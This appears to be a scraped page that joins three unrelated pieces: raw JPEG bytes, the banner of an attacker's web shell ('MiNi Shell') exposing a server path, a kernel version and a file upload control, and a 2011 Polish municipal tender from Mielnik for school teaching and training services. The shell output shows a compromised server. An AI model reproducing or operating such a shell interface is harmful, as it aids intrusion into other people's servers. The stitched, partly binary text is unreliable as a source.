JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111110/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111110/374188-N-2011.html

<p class="kh_header"><b>Mielnik: Usługi edukacyjne i szkoleniowe, dotyczące prowadzenia zajęć w ramach projektu nr WND-POKL.09.01.02-20-575.11 Szkoła Sukcesu II - rozwój umiejętności kluczowych drogą do sukcesu</b><br>
<b>Numer ogłoszenia: 374188 - 2011; data zamieszczenia: 10.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Mielnik , ul. Piaskowa 38, 17-307 Mielnik, woj. podlaskie, tel. 085 6577003, faks 085 6577121.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi edukacyjne i szkoleniowe, dotyczące prowadzenia zajęć w ramach projektu nr WND-POKL.09.01.02-20-575.11 Szkoła Sukcesu II - rozwój umiejętności kluczowych drogą do sukcesu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług edukacyjnych i szkoleniowych polegających na prowadzeniu zajęć w ramach projektu nr WND-POKL.09.01.02-20-575.11 pn. Szkoła Sukcesu II - rozwój umiejętności kluczowych drogą do sukcesu.
Projekt jest dofinansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX, Poddziałanie 9.1.2.
Usługi będą realizowane w niżej wymienionych specjalnościach w Szkole Podstawowej i Publicznym Gimnazjum w Zespole Szkół im. Unii Mielnickiej w Mielniku.
Zamawiający dopuszcza możliwości składania ofert częściowych (na każdą część osobno) t.j. 32 części, z podziałem na następujące części:

1) Część nr 1. Zajęcia wyrównawcze z matematyki z wykorzystaniem technologii informatycznej dla uczniów kl. V szkoły podstawowej: 33 godziny w 1 grupie; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania matematyki.

2) Część nr 2. Zajęcia wyrównawcze z matematyki z wykorzystaniem technologii informatycznej dla uczniów kl. VI szkoły podstawowej: 33 godziny w 1 grupie; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania matematyki.

3) Część nr 3. Zajęcia wyrównawcze z języka polskiego z wykorzystaniem technologii informatycznej dla uczniów kl. V szkoły podstawowej: 33 godzin w 1 grupie. Wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania języka polskiego.

4) Część nr 4. Zajęcia wyrównawcze z języka polskiego z wykorzystaniem technologii informatycznej dla uczniów kl. VI szkoły podstawowej: 33 godzin w 1 grupie. Wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania języka polskiego.

5) Część nr 5. Zajęcia wyrównawcze z historii z wykorzystaniem technologii informatycznej dla uczniów kl. VI szkoły podstawowej: 33 godziny w 1 grupie. Wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania historii.

6) Część nr 6.  Zajęcia wyrównawcze z przyrody z wykorzystaniem technologii informatycznej dla uczniów kl. VI szkoły podstawowej: 33 godziny w 1 grupie. Wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania przyrody.

7) Część nr 7. Zajęcia wyrównawcze z historii z wykorzystaniem technologii informatycznej dla uczniów kl. III gimnazjum: 33 godziny w 1 grupie. Wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania historii i doświadczenie w realizacji nowej podstawy programowej z historii w gimnazjum.

8) Część nr 8. Zajęcia wyrównawcze z języka polskiego z wykorzystaniem technologii informatycznej dla uczniów kl. III gimnazjum: 66 godzin w 1 grupie. Wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania języka polskiego i doświadczenie w realizacji nowej podstawy programowej z języka polskiego w gimnazjum.

9) Część nr 9. Zajęcia wyrównawcze z matematyki z wykorzystaniem technologii informatycznej dla uczniów kl. III gimnazjum: 66 godzin w 1 grupie; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania matematyki i doświadczenie w realizacji nowej podstawy programowej z matematyki w gimnazjum.

10) Część nr 10. Zajęcia wyrównawcze z geografii z wykorzystaniem technologii informatycznej dla uczniów kl. III gimnazjum: 33 godziny w 1 grupie. Wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania geografii i doświadczenie w realizacji nowej podstawy programowej z geografii w gimnazjum.

11) Część nr 11. Zajęcia wyrównawcze z fizyki z wykorzystaniem technologii informatycznej dla uczniów kl. III gimnazjum: 33 godziny w 1 grupie. Wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania fizyki i doświadczenie w realizacji nowej podstawy programowej z fizyki w gimnazjum.

12) Część nr 12. Zajęcia wyrównawcze z chemii z wykorzystaniem technologii informatycznej dla uczniów kl. III gimnazjum: 33 godziny w 1 grupie. Wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania chemii i doświadczenie w realizacji nowej podstawy programowej z chemii w gimnazjum.

13) Część nr 13. Zajęcia wyrównawcze z biologii z wykorzystaniem technologii informatycznej dla uczniów kl.III gimnazjum: 33 godziny w 1 grupie. Wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania biologii i doświadczenie w realizacji nowej podstawy programowej z biologii w gimnazjum.

14) Część nr 14. Zajęcia specjalistyczne dla uczniów upośledzonych w stopniu umiarkowanym z kl. I-VI szkoły podstawowej: 56 godzin w 1 grupie. Wymagane jest, by prowadzący te zajęcia posiadał kwalifikacje z oligofrenopedagogiki i doświadczenie w pracy z uczniami upośledzonymi umysłowo w stopniu umiarkowanym.

15) Część nr 15. Zajęcia specjalistyczne dla uczniów upośledzonych w stopniu lekkim i uczniów niedosłyszących z kl. I-VI szkoły podstawowej: 56 godzin w 1 grupie. Wymagane jest, by prowadzący te zajęcia posiadał kwalifikacje z oligofrenopedagogiki, surdopedagogiki i doświadczenie w pracy z uczniami upośledzonymi umysłowo w stopniu lekkim i uczniami niedosłyszącymi.

16) Część nr 16. Zajęcia specjalistyczne dla uczniów upośledzonych w stopniu lekkim z kl. I-III gimnazjum: 56 godzin w 1 grupie; wymagane jest, by prowadzący te zajęcia posiadał kwalifikacje z oligofrenopedagogiki i doświadczenie w pracy z uczniami upośledzonymi umysłowo w stopniu lekkim.

17) Część nr 17.  Zajęcia z chemii rozwijające kompetencje kluczowe prowadzone metodą projektów edukacyjnych dla uczniów gimnazjum: 60 godzin (6 projektów po 10 godzin) dla 6 grup; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania chemii i doświadczenie w realizacji nowej podstawy programowej z chemii w gimnazjum.

18) Część nr 18. Zajęcia z biologii rozwijające kompetencje kluczowe prowadzone metodą projektów edukacyjnych dla uczniów gimnazjum: 30 godzin (3 projekty po 10 godzin) dla 3 grup; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania biologii i doświadczenie w realizacji nowej podstawy programowej z biologii w gimnazjum.

19) Część nr 19. Zajęcia z fizyki rozwijające kompetencje kluczowe prowadzone metodą projektów edukacyjnych dla uczniów gimnazjum: 30 godzin (3 projekty po 10 godzin) dla 3 grup; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania fizyki i doświadczenie w realizacji nowej podstawy programowej z fizyki w gimnazjum.

20) Część nr 20. Zajęcia z geografii rozwijające kompetencje kluczowe prowadzone metodą projektów edukacyjnych dla uczniów gimnazjum: 30 godzin (3 projekty po 10 godzin) dla 3 grup; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania geografii i doświadczenie w realizacji nowej podstawy programowej z geografii w gimnazjum.

21) Część nr 21. Zajęcia rozwijające kompetencje porozumiewania się w językach obcych - zajęcia z języka angielskiego dla kl. I-III szkoły podstawowej - 78 godzin w 6 grupach, 13 godzin dla jednej grupy wymagane jest, by prowadzący te zajęcia posiadał kwalifikacje w zakresie prowadzenia zajęć z języka angielskiego.

22)Część nr 22. Zajęcia rozwijające kompetencje porozumiewania się w językach obcych - zajęcia z języka angielskiego dla kl. IV-VI szkoły podstawowej - 52 godziny w 4 grupach, 13 godzin dla jednej grupy  wymagane jest, by prowadzący te zajęcia posiadał kwalifikacje w zakresie prowadzenia zajęć z języka angielskiego.

23) Część nr 23. Zajęcia rozwijające kompetencje porozumiewania się w językach obcych - zajęcia z języka angielskiego dla kl. I-III gimnazjum - 78 godzin w 6 grupach, 13 godzin dla jednej grupy wymagane jest, by prowadzący te zajęcia posiadał kwalifikacje w zakresie prowadzenia zajęć z języka angielskiego i doświadczenie w realizacji nowej podstawy programowej z języka angielskiego w gimnazjum.

24) Część nr 24. Zajęcia rozwijające kompetencje porozumiewania się w językach obcych - zajęcia z języka rosyjskiego dla kl. IV-VI szkoły podstawowej - 52 godziny w 4 grupach, 13 godzin dla jednej grupy  wymagane jest, by prowadzący te zajęcia posiadał kwalifikacje w zakresie prowadzenia zajęć z języka rosyjskiego.

25) Część nr 25. Zajęcia rozwijające kompetencje porozumiewania się w językach obcych - zajęcia z języka rosyjskiego dla kl. I-III gimnazjum - 78 godzin w 6 grupach, 13 godzin dla jednej grupy wymagane jest, by prowadzący te zajęcia posiadał kwalifikacje w zakresie prowadzenia zajęć z języka rosyjskiego i doświadczenie w realizacji nowej podstawy programowej z języka rosyjskiego w gimnazjum.

26) Część nr 26. Każdy wielki był niewielki - zajęcia budzące wiarę we własne możliwości i motywację do nauki dla kl. I szkoły podstawowej - praca metodą projektów, 2 projekty po 10 godzin dla 1 grupy, wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie edukacji wczesnoszkolnej.

27) Część nr 27. Każdy wielki był niewielki- zajęcia budzące wiarę we własne możliwości i motywację do nauki dla kl. II szkoły podstawowej - praca metodą projektów, 2 projekty po 10 godzin dla 1 grupy, wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie edukacji wczesnoszkolnej.

28) Część nr 28. Każdy wielki był niewielki - zajęcia budzące wiarę we własne możliwości i motywację do nauki dla kl. III a szkoły podstawowej - praca metodą projektów, 2 projekty po 10 godzin dla 1 grupy, wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie edukacji wczesnoszkolnej.

29) Część nr 29. Każdy wielki był niewielki - zajęcia budzące wiarę we własne możliwości i motywację do nauki dla kl. III b szkoły podstawowej - praca metodą projektów, 2 projekty po 10 godzin dla 1 grupy, wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie edukacji wczesnoszkolnej.

30) Część nr 30. SZOK - zajęcia z doradztwa zawodowego i wyboru dalszej ścieżki edukacyjnej dla uczniów gimnazjum - 72 godziny zajęć, wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie doradztwa zawodowego.

31) Część nr 31. Zakup usługi szkoleniowej: Szkolenie na temat równości szans kobiet i mężczyzn dla członków kadry realizującej projekt - szkolenie z zakresu przeciwdziałania stereotypom i dyskryminacji ze względu na wiek i płeć i inne cechy, np. niepełnosprawności - szkolenie w wymiarze 8 godzin + materiały szkoleniowe. Wymagane jest by prowadzący to szkolenie posiadał kwalifikacje w zakresie szkoleń w w/w tematyce.

32) Część nr 32. Zakup usługi szkoleniowej: Szkolenie na temat innowacyjnych metod nauczania dla nauczycieli Zespołu Szkół w Mielniku - szkolenie na temat zastosowania nowoczesnych środków, form i metod nauczania (np. tablice multimedialne, metoda projektów, technologia informatyczna) - przeprowadzenie szkolenia w wymiarze 8 godzin + materiały szkoleniowe; wymagane jest by prowadzący to szkolenie posiadał kwalifikacje w zakresie szkoleń w w/w tematyce..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 32.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.07.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia wykonawcy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia wykonawcy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, o ile Wykonawca wykaże, że dysponuje co najmniej jedną osobą (nauczycielem) zdolną do wykonania każdej z części zamówienia, na które wykonawca składa ofertę:
 Wskazana osoba powinna posiadać:
1.	Kwalifikacje do prowadzenia danego rodzaju prowadzonych zajęć w Zespole Szkół w Mielniku zgodnie z rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz.U. z 2009r. Nr 50, poz.400) oraz korzystającą z pełni praw publicznych.
2.	Przygotowanie pedagogiczne;
3.	Kwalifikacje do nauczania danego rodzaju zajęć w szkole (odpowiednio: szkole podstawowej lub gimnazjum), określone w rozdz. III ust.1 punkty od 1 do 30;
4.	Co najmniej trzyletni staż pracy jako nauczyciel;
5.	Pełną zdolność do czynności prawnych oraz powinna korzystać w pełni z praw publicznych.
Ocena spełniania wymienionego wyżej warunku udziału w postępowaniu, zostanie dokonana, na podstawie oświadczenia Wykonawcy oraz wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia,  dołączonego przez Wykonawcę do oferty - wg  wzoru załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zamawiający uzna warunek za spełniony na podstawie oświadczenia wykonawcy.
2. Wykonawca jest zobowiązany wykazać brak podstaw do wykluczenia z powodu niespełniania warunków, o których mowa w art. 24 ust 1 Ustawy, składając oświadczenie o braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy - wg wzoru załącznik nr 6 do SIWZ.
3. Zamawiający dokona oceny spełnienia warunków wg formuły spełnia lub nie spełnia w oparciu o wymagane dokumenty, których forma opisana jest w rozdz. V SIWZ.
4. Z postępowania wyklucza się Wykonawców, którzy nie wykazali spełnienia warunków udziału w postępowaniu i braku podstaw do wykluczenia. Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - doświadczenie zawodowe - 50</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany w zapisach umowy w formie aneksu w przypadku zmian we wniosku aplikacyjnym projektu WND-POKL.09.01.02-20-575.11 pn. Szkoła Sukcesu II - rozwój umiejętności kluczowych drogą do sukcesu, niemożliwych do przewidzenia na etapie opracowywania SIWZ, a które to będą wywoływały konieczność zmiany zapisów umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mielnik.com.pl (BIP)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Mielnik
ul. Piaskowa 38
17-307 Mielnik.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.11.2011 godzina 09:30, miejsce: Urząd Gminy Mielnik
ul. Piaskowa 38
17-307 Mielnik.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zajęcia wyrównawcze z matematyki z wykorzystaniem technologii informatycznej dla uczniów kl. V szkoły podstawowej: 33 godziny w 1 grupie; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania matematyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia wyrównawcze z matematyki z wykorzystaniem technologii informatycznej dla uczniów kl. V szkoły podstawowej: 33 godziny w 1 grupie; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania matematyki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. doświadczenie zawodowe - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zajęcia wyrównawcze z matematyki z wykorzystaniem technologii informatycznej dla uczniów kl. VI szkoły podstawowej: 33 godziny w 1 grupie; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania matematyki;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia wyrównawcze z matematyki z wykorzystaniem technologii informatycznej dla uczniów kl. VI szkoły podstawowej: 33 godziny w 1 grupie; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania matematyki;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. doświadczenie zawodowe - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zajęcia wyrównawcze z języka polskiego z wykorzystaniem technologii informatycznej dla uczniów kl. V szkoły podstawowej: 33 godzin w 1 grupie; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania języka polskiego;.</p>
